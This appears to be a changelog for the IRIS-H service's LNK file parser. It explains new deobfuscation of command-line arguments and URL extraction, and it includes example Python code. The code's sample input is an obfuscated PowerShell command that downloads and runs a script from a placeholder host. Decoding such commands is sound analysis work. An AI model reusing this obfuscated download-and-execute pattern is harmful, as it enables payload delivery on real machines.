Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API & UI (clear your browser cache for 'iris-h.services' to see the changes)
Short Description: Parser for LNK files has been updated. Command line arguments string deobfuscation and URL extraction code have been added. UI Report page has been updated to display the new data.
Outstanding Tasks: None
Detailed Summary
The IRIS-H Shell Link (.LNK) file parser has been updated and now attempts to deobfuscate the command line arguments string stored in the link. When a command line arguments string is present, the service attempts the following:
- detect environment variable assignments made with the 'set' command
- detect environment variable references written with the ' ! ' (delayed expansion) and ' % ' delimiters
- replace referenced environment variables with their corresponding values
- remove the escape characters ' ^ ' (cmd.exe) and ' ` ' (PowerShell)
- detect and extract URL strings
- detect string concatenation operations and perform them
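As an added illustration of the steps above (this is not IRIS-H's own code, and the sample argument string is constructed for the example rather than taken from the linked report), the following Python walks one cmd.exe/PowerShell-style argument string through assignment collection, variable expansion, escape removal, concatenation folding and URL extraction:

```python
import re

# Constructed sample (not from the IRIS-H report): one argument string that
# combines the tricks listed in the post - 'set' assignments, %var% and !var!
# references, a cmd.exe '^' escape, a PowerShell '`' escape and 'a'+'b'
# concatenation splitting the URL.
SAMPLE_ARGS = (
    '/c set "p=pow" & set q=ersh^ell & '
    "%p%!q! -w hidden -c \"$u='http://exa'+'mple.test/pa'+'yload.ps1'; "
    "i`ex (New-Object Net.WebClient).DownloadString($u)\""
)

# set "NAME=value"  (quoted form, value may contain & and |)
SET_QUOTED = re.compile(r'\bset\s+"(?P<name>[^=\s"]+)=(?P<value>[^"]*)"', re.I)
# set NAME=value    (bare form, value ends at the next command separator)
SET_BARE = re.compile(r'\bset\s+(?P<name>[^=\s"]+)=(?P<value>[^&|]*)', re.I)
# %NAME% or !NAME! references
VAR_REF = re.compile(r'%(?P<n1>[^%\s]+)%|!(?P<n2>[^!\s]+)!')
# 'a'+'b' or "a"+"b" with matching quote style on both sides
CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*\1([^'"]*)\1""")
URL = re.compile(r"""https?://[^\s'"<>()]+""")
ESCAPES = str.maketrans('', '', '^`')


def collect_assignments(args):
    """Return {NAME: value} for every 'set' command found in the string."""
    env = {}
    for pattern in (SET_QUOTED, SET_BARE):
        for m in pattern.finditer(args):
            # cmd.exe consumes '^' while parsing, so the stored value has none.
            # Trailing whitespace is stripped here for readability; cmd.exe
            # itself would keep it, which is why obfuscators use the quoted form.
            # Variable names are case-insensitive, so they are keyed uppercased.
            env[m.group('name').upper()] = m.group('value').rstrip().replace('^', '')
    return env


def expand_variables(text, env, max_rounds=10):
    """Replace %NAME% / !NAME! with known values; unknown names are left alone.
    Runs repeatedly because a value may itself reference another variable."""
    def lookup(m):
        name = (m.group('n1') or m.group('n2')).upper()
        return env.get(name, m.group(0))
    for _ in range(max_rounds):
        new = VAR_REF.sub(lookup, text)
        if new == text:
            break
        text = new
    return text


def fold_concatenations(text):
    """Join 'a'+'b'+'c' into 'abc', repeating until nothing changes."""
    while True:
        text, count = CONCAT.subn(r'\1\2\3\1', text)
        if count == 0:
            return text


def deobfuscate(args):
    """Apply the steps in order and return the variables, the cleaned string
    and the URLs found in it."""
    env = collect_assignments(args)
    text = expand_variables(args, env)
    text = text.translate(ESCAPES)        # drop '^' and '`' escapes
    text = fold_concatenations(text)
    urls = list(dict.fromkeys(URL.findall(text)))   # de-duplicate, keep order
    return {'variables': env, 'deobfuscated': text, 'urls': urls}


if __name__ == '__main__':
    result = deobfuscate(SAMPLE_ARGS)
    print('variables   :', result['variables'])
    print('deobfuscated:', result['deobfuscated'])
    print('urls        :', result['urls'])
```

Two caveats worth keeping in mind when reading output from any tool that works this way: cmd.exe treats '^' inside a double-quoted string as a literal character, and in PowerShell a backtick followed by certain letters (for example `n or `t) is an escape sequence rather than padding, so stripping every '^' and '`' is an approximation that can occasionally alter a legitimate value. Substring expansion of the form %var:~start,len% is not handled here either, so an unexpanded reference in the output is a hint that the original needs manual attention.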
Below is a report example showing the new feature in action.
[Screenshot: LNK file analysis results showing the deobfuscated command line arguments string and the extracted URL]
Corresponding report - https://iris-h.services/report/7278cb3c9a5b14dcc54de59e21ec8c6c
More examples can be found here:
NOTE
IRIS-H UI changes might require you to clear your browser cache for the iris-h.services website before they take effect.